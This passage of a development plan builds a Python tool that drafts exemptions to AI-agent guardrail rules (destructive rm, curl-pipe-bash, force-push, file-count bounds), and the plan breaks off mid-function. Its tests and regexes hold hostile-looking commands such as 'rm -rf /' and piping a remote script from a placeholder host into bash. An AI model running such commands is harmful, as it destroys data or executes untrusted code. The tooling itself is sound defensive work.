+def test_pattern_with_no_decisions_returns_none():
+    p = Pattern(
+        rule_id="no-destructive-rm",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_template_no_destructive_rm.py -v`
+Expected: FAIL with `ModuleNotFoundError`.
+
+- [ ] **Step 3: Implement template**
+
+```python
+# python/analysis/templates/no_destructive_rm.py
+"""Template for the `no-destructive-rm` rule.
+
+Proposes an exemption for known-safe directories. Tested against real data
+(19 denies for copilot-cli, 8 unknown agent, 3 claude-code in week 2026-04-23).
+"""
+from __future__ import annotations
+
+import re
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+# Patterns considered safe to exempt. Conservative — extend only with evidence.
+SAFE_PATTERNS = [
+    re.compile(r"\brm\s+-rf?\s+(?:[^/]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)"),
+    re.compile(r"\brm\s+-rf?\s+/tmp/"),
+    re.compile(r"\brm\s+-rf?\s+\.\./?(?:tmp|test|out)/"),
+]
+
+
+def _matches_safe(target: str) -> bool:
+    if not target:
+        return False
+    return any(p.search(target) for p in SAFE_PATTERNS)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    safe_count = sum(1 for d in pattern.decisions if _matches_safe(d.action_target or ""))
+    if safe_count == 0:
+        return None  # No exemption worth proposing.
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: no-destructive-rm-safe-dirs\n"
+        "    when:\n"
+        "      action_type: shell.exec\n"
+        "      action_target_regex: '\\brm\\s+-rf?\\s+(?:[^/]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)'\n"
+        "    decide: allow\n"
+        "    reason: 'cleanup of known-temp dirs (analysis-suggested 2026-04-30)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=safe_count,
+        would_still_deny=pattern.count - safe_count,
+        method="regex-match-on-action_target",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_destructive_rm",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Proposes exemption for cleanup in /tmp, /test, out/, graphify-out/, build/, dist/, node_modules/.",
+    )
+
+
+register("no-destructive-rm", draft)
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_template_no_destructive_rm.py -v`
+Expected: PASS, 4 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/no_destructive_rm.py python/analysis/tests/test_template_no_destructive_rm.py
+git commit -m "feat(analysis): no-destructive-rm template with safe-dirs exemption"
+```
+
+---
+
+## Task 7: Template — `bounds:max_files_changed`
+
+Doc-batch detection. If all changed paths share `docs/` prefix, propose context-aware ceiling. (This is literally Issue #70.)
+
+**Files:**
+- Create: `python/analysis/templates/bounds_max_files_changed.py`
+- Create: `python/analysis/tests/test_template_bounds_max_files.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_template_bounds_max_files.py
+"""Tests for the bounds:max_files_changed heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.bounds_max_files_changed import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern_with_reason(*reasons):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="bounds:max_files_changed",
+            action_type="git.push",
+            reason=r,
+            envelope_id=f"e{i}",
+        )
+        for i, r in enumerate(reasons)
+    )
+    return Pattern(
+        rule_id="bounds:max_files_changed",
+        action_type="git.push",
+        agent_id="<unknown>",
+        count=len(reasons),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_doc_batch_drafted():
+    p = _pattern_with_reason(
+        "41 files changed exceeds ceiling of 25 (all under docs/)",
+        "30 files changed exceeds ceiling of 25 (all under docs/)",
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.template == "bounds_max_files_changed"
+    assert "doc-batch" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 2
+
+
+def test_no_doc_signal_returns_none():
+    p = _pattern_with_reason(
+        "60 files changed exceeds ceiling of 25",
+        "100 files changed exceeds ceiling of 25",
+    )
+    d = draft(p)
+    assert d is None
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="bounds:max_files_changed",
+        action_type="git.push",
+        agent_id="<unknown>",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_template_bounds_max_files.py -v`
+Expected: FAIL.
+
+- [ ] **Step 3: Implement template**
+
+```python
+# python/analysis/templates/bounds_max_files_changed.py
+"""Template for `bounds:max_files_changed`.
+
+The kernel-level bounds rule fires for any push exceeding the ceiling. The
+common false-positive is doc batches (per Issue #70). Heuristic: if the
+deny reason mentions docs/, propose a context-aware ceiling.
+"""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+DOC_KEYWORDS = ("docs/", "wiki/", "README", "graphify-out/")
+
+
+def _is_doc_batch(reason: str) -> bool:
+    if not reason:
+        return False
+    return any(k in reason for k in DOC_KEYWORDS)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    doc_count = sum(1 for d in pattern.decisions if _is_doc_batch(d.reason or ""))
+    if doc_count == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: bounds-max-files-doc-batch\n"
+        "    when:\n"
+        "      action_type: git.push\n"
+        "      changed_paths_all_match: '^(docs/|wiki/|graphify-out/)'\n"
+        "    bounds:\n"
+        "      max_files_changed: 200\n"
+        "      max_lines_changed: 10000\n"
+        "    reason: 'doc-batch ceiling override (analysis-suggested 2026-04-30)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=doc_count,
+        would_still_deny=pattern.count - doc_count,
+        method="reason-mentions-doc-keyword",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="bounds_max_files_changed",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Doc-batch detected via reason text; tighten with changed_paths inspection in v2.",
+    )
+
+
+register("bounds:max_files_changed", draft)
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_template_bounds_max_files.py -v`
+Expected: PASS.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/bounds_max_files_changed.py python/analysis/tests/test_template_bounds_max_files.py
+git commit -m "feat(analysis): bounds:max_files_changed template with doc-batch detection"
+```
+
+---
+
+## Task 8: Template — `no-curl-pipe-bash`
+
+Extract URL host from action_target. Propose host-allowlist exception for known-trusted hosts.
+
+**Files:**
+- Create: `python/analysis/templates/no_curl_pipe_bash.py`
+- Create: `python/analysis/tests/test_template_no_curl_pipe_bash.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_template_no_curl_pipe_bash.py
+"""Tests for the no-curl-pipe-bash heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_curl_pipe_bash import draft, extract_host
+from analysis.types import Decision, Pattern
+
+
+def _pattern(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-curl-pipe-bash",
+            action_type="shell.exec",
+            action_target=t,
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-curl-pipe-bash",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_extract_host_basic():
+    assert extract_host("curl https://example.com/x.sh | bash") == "example.com"
+    assert extract_host("curl http://foo.bar.baz/a | sh") == "foo.bar.baz"
+    assert extract_host("curl -L https://get.deno.land/install.sh | sh") == "get.deno.land"
+
+
+def test_extract_host_returns_none_for_no_url():
+    assert extract_host("") is None
+    assert extract_host("rm -rf /") is None
+    assert extract_host("curl | bash") is None
+
+
+def test_trusted_hosts_drafted():
+    p = _pattern(
+        "curl https://get.deno.land/install.sh | sh",
+        "curl https://sh.rustup.rs | sh",
+    )
+    d = draft(p)
+    assert d is not None
+    assert "trusted-curl-hosts" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 2
+
+
+def test_unknown_host_returns_none():
+    p = _pattern("curl https://random-blog.example/script.sh | bash")
+    assert draft(p) is None
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="no-curl-pipe-bash",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_template_no_curl_pipe_bash.py -v`
+Expected: FAIL.
+
+- [ ] **Step 3: Implement template**
+
+```python
+# python/analysis/templates/no_curl_pipe_bash.py
+"""Template for `no-curl-pipe-bash`.
+
+Heuristic: extract URL host from the curl command. If the host is on a
+known-trusted list (rustup, deno, ...), propose host-allowlist exemption.
+"""
+from __future__ import annotations
+
+import re
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+# Hosts known to publish official installer scripts. Conservative — only add
+# with evidence (e.g., reviewer-blessed before merge).
+TRUSTED_HOSTS = frozenset({
+    "get.deno.land",
+    "sh.rustup.rs",
+    "install.python-poetry.org",
+    "raw.githubusercontent.com",  # GitHub-hosted; relies on path-based judgment
+})
+
+URL_RE = re.compile(r"https?://([^/\s|]+)")
+
+
+def extract_host(target: str) -> Optional[str]:
+    if not target:
+        return None
+    m = URL_RE.search(target)
+    return m.group(1) if m else None
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    hosts = [extract_host(d.action_target or "") for d in pattern.decisions]
+    trusted = sum(1 for h in hosts if h and h in TRUSTED_HOSTS)
+    if trusted == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: trusted-curl-hosts\n"
+        "    when:\n"
+        "      action_type: shell.exec\n"
+        "      action_target_regex: 'curl[^|]*https?://(get\\.deno\\.land|sh\\.rustup\\.rs|install\\.python-poetry\\.org)/'\n"
+        "    decide: allow\n"
+        "    reason: 'official installer from trusted host (analysis-suggested 2026-04-30)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=trusted,
+        would_still_deny=pattern.count - trusted,
+        method="host-extracted-from-url-allowlist",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_curl_pipe_bash",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Trusted-host list is conservative; extend with reviewer approval.",
+    )
+
+
+register("no-curl-pipe-bash", draft)
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_template_no_curl_pipe_bash.py -v`
+Expected: PASS.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/no_curl_pipe_bash.py python/analysis/tests/test_template_no_curl_pipe_bash.py
+git commit -m "feat(analysis): no-curl-pipe-bash template with trusted-host allowlist"
+```
+
+---
+
+## Task 9: Template — `no-force-push`
+
+Branch detection. Allow on personal/feature branches, keep deny on main/master.
+
+**Files:**
+- Create: `python/analysis/templates/no_force_push.py`
+- Create: `python/analysis/tests/test_template_no_force_push.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_template_no_force_push.py
+"""Tests for the no-force-push heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_force_push import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-force-push",
+            action_type="git.force-push",
+            action_target=t,
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-force-push",
+        action_type="git.force-push",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_personal_branches_drafted():
+    p = _pattern("feat/foo", "fix/bar", "spike/x")
+    d = draft(p)
+    assert d is not None
+    assert "no-force-push-feature-branches" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 3
+
+
+def test_main_still_denied():
+    p = _pattern("main", "master")
+    d = draft(p)
+    assert d is None
+
+
+def test_mixed():
+    p = _pattern("feat/foo", "main", "fix/bar")
+    d = draft(p)
+    assert d is not None
+    assert d.predicted_impact.would_allow == 2
+    assert d.predicted_impact.would_still_deny == 1
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="no-force-push",
+        action_type="git.force-push",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_template_no_force_push.py -v`
+Expected: FAIL.
+
+- [ ] **Step 3: Implement template**
+
+```python
+# python/analysis/templates/no_force_push.py
+"""Template for `no-force-push`.
+
+Heuristic: keep deny on main/master, propose allow on feat/fix/spike branches.
+"""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+PROTECTED_BRANCHES = frozenset({"main", "master", "production", "release"})
+FEATURE_PREFIXES = ("feat/", "fix/", "spike/", "feature/", "bugfix/", "wip/", "draft/")
+
+
+def _is_safe_branch(target: str) -> bool:
+    if not target:
+        return False
+    branch = target.strip()
+    if branch in PROTECTED_BRANCHES:
+        return False
+    return any(branch.startswith(p) for p in FEATURE_PREFIXES)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    safe_count = sum(1 for d in pattern.decisions if _is_safe_branch(d.action_target or ""))
+    if safe_count == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: no-force-push-feature-branches\n"
+        "    when:\n"
+        "      action_type: git.force-push\n"
+        "      action_target_regex: '^(feat|fix|spike|feature|bugfix|wip|draft)/'\n"
+        "    decide: allow\n"
+        "    reason: 'force-push allowed on personal/feature branches (analysis-suggested 2026-04-30)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=safe_count,
+        would_still_deny=pattern.count - safe_count,
+        method="branch-prefix-match",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_force_push",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Protected branches (main/master/production/release) keep the deny.",
+    )
+
+
+register("no-force-push", draft)
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_template_no_force_push.py -v`
+Expected: PASS.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/no_force_push.py python/analysis/tests/test_template_no_force_push.py
+git commit -m "feat(analysis): no-force-push template — feature branches allowed, main protected"
+```
+
+---
+
+## Task 10: Template auto-import + integration test
+
+Templates self-register via module import side-effects. Make sure they import.
+
+**Files:**
+- Modify: `python/analysis/templates/__init__.py`
+- Create: `python/analysis/tests/test_templates_auto_register.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_templates_auto_register.py
+"""Tests that all v1 templates self-register on import."""
+from analysis.templates import REGISTRY
+import analysis.templates.all  # noqa: F401  (triggers registration)
+
+
+def test_all_v1_templates_registered():
+    expected = {
+        "no-destructive-rm",
+        "bounds:max_files_changed",
+        "no-curl-pipe-bash",
+        "no-force-push",
+    }
+    assert expected.issubset(REGISTRY.keys())
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_templates_auto_register.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.templates.all'`
+
+- [ ] **Step 3: Create the all-importer**
+
+```python
+# python/analysis/templates/all.py
+"""Single import to load every v1 template (triggers registration).
+
+Order is alphabetical for predictability; registration order does not matter
+for correctness, only for which template wins on conflicting rule_id (none in v1).
+"""
+from analysis.templates import bounds_max_files_changed  # noqa: F401
+from analysis.templates import no_curl_pipe_bash         # noqa: F401
+from analysis.templates import no_destructive_rm         # noqa: F401
+from analysis.templates import no_force_push             # noqa: F401
+```
+
+- [ ] **Step 4: Run test to verify it passes**
+
+Run: `cd python/analysis && pytest tests/test_templates_auto_register.py -v`
+Expected: PASS.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/all.py python/analysis/tests/test_templates_auto_register.py
+git commit -m "feat(analysis): single-import all-templates loader for registration"
+```
+
+---
+
+## Task 11: JSON writer with deterministic output
+
+**Files:**
+- Create: `python/analysis/writers.py`
+- Create: `python/analysis/tests/test_writers_json.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_writers_json.py
+"""Tests for JSON canonical writer."""
+import json
+from datetime import datetime, timezone
+
+import pytest
+
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+from analysis.writers import Finding, build_finding, write_json
+
+
+def _pattern():
+    return Pattern(
+        rule_id="r1",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=3,
+        first_seen=datetime(2026, 4, 25, 8, 0, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, 9, 0, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=("e1", "e2", "e3"),
+        decisions=(),
+    )
+
+
+def _draft():
+    return RuleDraft(
+        kind="heuristic",
+        template="t1",
+        confidence="medium",
+        rule_yaml="rules: []\n",
+        predicted_impact=PredictedImpact(
+            samples_evaluated=3, would_allow=2, would_still_deny=1, method="m"
+        ),
+        notes="n",
+    )
+
+
+def test_build_finding_pairs_pattern_with_draft():
+    f = build_finding(_pattern(), _draft(), rank=1)
+    assert f.rank == 1
+    assert f.pattern.rule_id == "r1"
+    assert f.draft is not None
+
+
+def test_build_finding_with_no_draft():
+    f = build_finding(_pattern(), None, rank=2)
+    assert f.draft is None
+
+
+def test_write_json_produces_deterministic_output(tmp_path):
+    findings = [build_finding(_pattern(), _draft(), rank=1)]
+    no_template = []
+    out = tmp_path / "out.json"
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    window_since = datetime(2026, 4, 23, 12, 0, tzinfo=timezone.utc)
+
+    write_json(out, findings=findings, no_template=no_template,
+               input_summary={"total_decisions": 1225, "denies": 62, "allows": 1163,
+                              "files_read": 6, "parse_errors": 0,
+                              "distinct_rule_ids": 14},
+               generated_at=now, window_since=window_since,
+               window_until=now, window_days=7)
+
+    a = out.read_bytes()
+
+    out2 = tmp_path / "out2.json"
+    write_json(out2, findings=findings, no_template=no_template,
+               input_summary={"total_decisions": 1225, "denies": 62, "allows": 1163,
+                              "files_read": 6, "parse_errors": 0,
+                              "distinct_rule_ids": 14},
+               generated_at=now, window_since=window_since,
+               window_until=now, window_days=7)
+    b = out2.read_bytes()
+
+    assert a == b
+    parsed = json.loads(a)
+    assert parsed["schema_version"] == "1"
+    assert parsed["stream"] == "decisions"
+    assert parsed["window"]["days"] == 7
+    assert parsed["input_summary"]["total_decisions"] == 1225
+    assert len(parsed["patterns"]) == 1
+    assert parsed["patterns"][0]["rank"] == 1
+    assert parsed["patterns"][0]["draft"]["predicted_impact"]["would_allow"] == 2
+
+
+def test_write_json_handles_empty_findings(tmp_path):
+    out = tmp_path / "empty.json"
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    write_json(out, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now, window_days=7)
+    parsed = json.loads(out.read_bytes())
+    assert parsed["patterns"] == []
+    assert parsed["no_template_patterns"] == []
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_writers_json.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.writers'`
+
+- [ ] **Step 3: Implement Finding + write_json**
+
+```python
+# python/analysis/writers.py
+"""Output writers — JSON canonical and markdown projection.
+
+JSON is the contract. Markdown is regenerable from JSON. Both deterministic
+given identical inputs (and a fixed `generated_at`).
+"""
+from __future__ import annotations
+
+import json
+from dataclasses import asdict, dataclass
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+
+@dataclass(frozen=True)
+class Finding:
+    """A pattern paired with a (possibly None) rule draft, plus rank."""
+
+    rank: int
+    pattern: Pattern
+    draft: Optional[RuleDraft]
+
+
+def build_finding(pattern: Pattern, draft: Optional[RuleDraft], rank: int) -> Finding:
+    return Finding(rank=rank, pattern=pattern, draft=draft)
+
+
+def _pattern_to_json(p: Pattern) -> dict[str, Any]:
+    return {
+        "rule_id": p.rule_id,
+        "action_type": p.action_type,
+        "agent_id": p.agent_id,
+        "count": p.count,
+        "first_seen": p.first_seen.isoformat(),
+        "last_seen": p.last_seen.isoformat(),
+        "decision_class": p.decision_class,
+        "sample_envelope_ids": list(p.sample_envelope_ids),
+    }
+
+
+def _draft_to_json(d: RuleDraft) -> dict[str, Any]:
+    return {
+        "kind": d.kind,
+        "template": d.template,
+        "confidence": d.confidence,
+        "rule_yaml": d.rule_yaml,
+        "predicted_impact": {
+            "samples_evaluated": d.predicted_impact.samples_evaluated,
+            "would_allow": d.predicted_impact.would_allow,
+            "would_still_deny": d.predicted_impact.would_still_deny,
+            "method": d.predicted_impact.method,
+        },
+        "notes": d.notes,
+    }
+
+
+def _finding_to_json(f: Finding) -> dict[str, Any]:
+    obj = {"rank": f.rank, **_pattern_to_json(f.pattern)}
+    obj["draft"] = _draft_to_json(f.draft) if f.draft else None
+    return obj
+
+
+def write_json(
+    path: Path,
+    *,
+    findings: list[Finding],
+    no_template: list[dict[str, Any]],
+    input_summary: dict[str, Any],
+    generated_at: datetime,
+    window_since: datetime,
+    window_until: datetime,
+    window_days: int,
+) -> None:
+    """Write the canonical analysis JSON. Deterministic given fixed inputs."""
+    path = Path(path)
+    path.parent.mkdir(parents=True, exist_ok=True)
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": generated_at.isoformat(),
+        "window": {
+            "days": window_days,
+            "since": window_since.isoformat(),
+            "until": window_until.isoformat(),
+        },
+        "input_summary": dict(input_summary),
+        "patterns": [_finding_to_json(f) for f in findings],
+        "no_template_patterns": list(no_template),
+    }
+    text = json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False)
+    path.write_text(text + "\n")
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_writers_json.py -v`
+Expected: PASS, 4 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/writers.py python/analysis/tests/test_writers_json.py
+git commit -m "feat(analysis): JSON canonical writer with deterministic output"
+```
+
+---
+
+## Task 12: Markdown writer
+
+**Files:**
+- Modify: `python/analysis/writers.py` (add `write_markdown`)
+- Create: `python/analysis/tests/test_writers_markdown.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_writers_markdown.py
+"""Tests for markdown projection writer."""
+import json
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.writers import write_markdown_from_json
+
+
+def _sample_json(tmp_path: Path) -> Path:
+    p = tmp_path / "decisions-2026-04-30.json"
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": "2026-04-30T12:00:00+00:00",
+        "window": {
+            "days": 7,
+            "since": "2026-04-23T12:00:00+00:00",
+            "until": "2026-04-30T12:00:00+00:00",
+        },
+        "input_summary": {
+            "total_decisions": 1225, "denies": 62, "allows": 1163,
+            "files_read": 6, "parse_errors": 0, "distinct_rule_ids": 14,
+        },
+        "patterns": [
+            {
+                "rank": 1,
+                "rule_id": "no-destructive-rm",
+                "action_type": "shell.exec",
+                "agent_id": "copilot-cli",
+                "count": 19,
+                "first_seen": "2026-04-23T08:00:00+00:00",
+                "last_seen": "2026-04-30T11:00:00+00:00",
+                "decision_class": "deny",
+                "sample_envelope_ids": ["env_001", "env_002", "env_003"],
+                "draft": {
+                    "kind": "heuristic",
+                    "template": "no_destructive_rm",
+                    "confidence": "medium",
+                    "rule_yaml": "rules:\n  - id: x\n",
+                    "predicted_impact": {
+                        "samples_evaluated": 19, "would_allow": 12,
+                        "would_still_deny": 7, "method": "regex",
+                    },
+                    "notes": "n",
+                },
+            }
+        ],
+        "no_template_patterns": [
+            {"rule_id": "envelope-exhausted", "action_type": "?",
+             "agent_id": "?", "count": 2,
+             "reason_no_template": "structural"}
+        ],
+    }
+    p.write_text(json.dumps(body, indent=2, sort_keys=True))
+    return p
+
+
+def test_markdown_renders_top_pattern(tmp_path):
+    json_path = _sample_json(tmp_path)
+    md_path = tmp_path / "decisions-2026-04-30.md"
+    write_markdown_from_json(json_path, md_path)
+    md = md_path.read_text()
+    assert "# Decisions Analysis — 2026-04-30" in md
+    assert "1225 decisions" in md
+    assert "no-destructive-rm" in md
+    assert "19 denies" in md
+    assert "samples_evaluated: 19" in md
+    assert "12 of 19" in md or "12 / 19" in md or "would_allow: 12" in md
+    assert "rules:" in md  # YAML block rendered
+
+
+def test_markdown_renders_no_template_section(tmp_path):
+    json_path = _sample_json(tmp_path)
+    md_path = tmp_path / "out.md"
+    write_markdown_from_json(json_path, md_path)
+    md = md_path.read_text()
+    assert "envelope-exhausted" in md
+
+
+def test_markdown_deterministic(tmp_path):
+    json_path = _sample_json(tmp_path)
+    a = tmp_path / "a.md"
+    b = tmp_path / "b.md"
+    write_markdown_from_json(json_path, a)
+    write_markdown_from_json(json_path, b)
+    assert a.read_bytes() == b.read_bytes()
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_writers_markdown.py -v`
+Expected: FAIL — `write_markdown_from_json` not defined.
+
+- [ ] **Step 3: Add write_markdown_from_json to writers.py**
+
+Add to the bottom of `python/analysis/writers.py`:
+
+```python
+def write_markdown_from_json(json_path: Path, md_path: Path) -> None:
+    """Render the markdown projection from a canonical JSON file.
+
+    Markdown is non-authoritative — JSON is the contract. This function reads
+    the JSON and produces a deterministic markdown rendering.
+    """
+    json_path = Path(json_path)
+    md_path = Path(md_path)
+    md_path.parent.mkdir(parents=True, exist_ok=True)
+
+    data = json.loads(json_path.read_text())
+    lines: list[str] = []
+
+    # Date for title from the until-bound (or generated_at).
+    until = data["window"]["until"][:10]  # YYYY-MM-DD
+    lines.append(f"# Decisions Analysis — {until}")
+    lines.append("")
+    lines.append(f"**Window:** {data['window']['days']}d "
+                 f"({data['window']['since'][:10]} → {until})")
+    summary = data["input_summary"]
+    lines.append(f"**Input:** {summary['total_decisions']} decisions "
+                 f"({summary['allows']} allowed, {summary['denies']} denied), "
+                 f"{summary['distinct_rule_ids']} distinct rule_ids, "
+                 f"{summary['parse_errors']} parse errors")
+    lines.append("")
+    lines.append("---")
+    lines.append("")
+
+    if not data["patterns"]:
+        lines.append("_No deny patterns in this window._")
+        lines.append("")
+    else:
+        lines.append("## Top patterns")
+        lines.append("")
+        for p in data["patterns"]:
+            _render_pattern(p, lines)
+
+    if data.get("no_template_patterns"):
+        lines.append("---")
+        lines.append("")
+        lines.append("## Patterns without a template")
+        lines.append("")
+        lines.append("These deny patterns were observed but no heuristic template "
+                     "knew how to draft a candidate rule. Surfaced for human review.")
+        lines.append("")
+        for nt in data["no_template_patterns"]:
+            lines.append(f"- **{nt['rule_id']}** × {nt['action_type']} × "
+                         f"{nt['agent_id']} — {nt['count']} denies "
+                         f"({nt['reason_no_template']})")
+        lines.append("")
+
+    md_path.write_text("\n".join(lines))
+
+
+def _render_pattern(p: dict[str, Any], lines: list[str]) -> None:
+    header = (f"### #{p['rank']} — {p['rule_id']} × {p['action_type']} × "
+              f"{p['agent_id']} ({p['count']} denies)")
+    lines.append(header)
+    lines.append("")
+    lines.append(f"First seen: {p['first_seen']}. Last seen: {p['last_seen']}.")
+    lines.append("")
+    if p["draft"] is None:
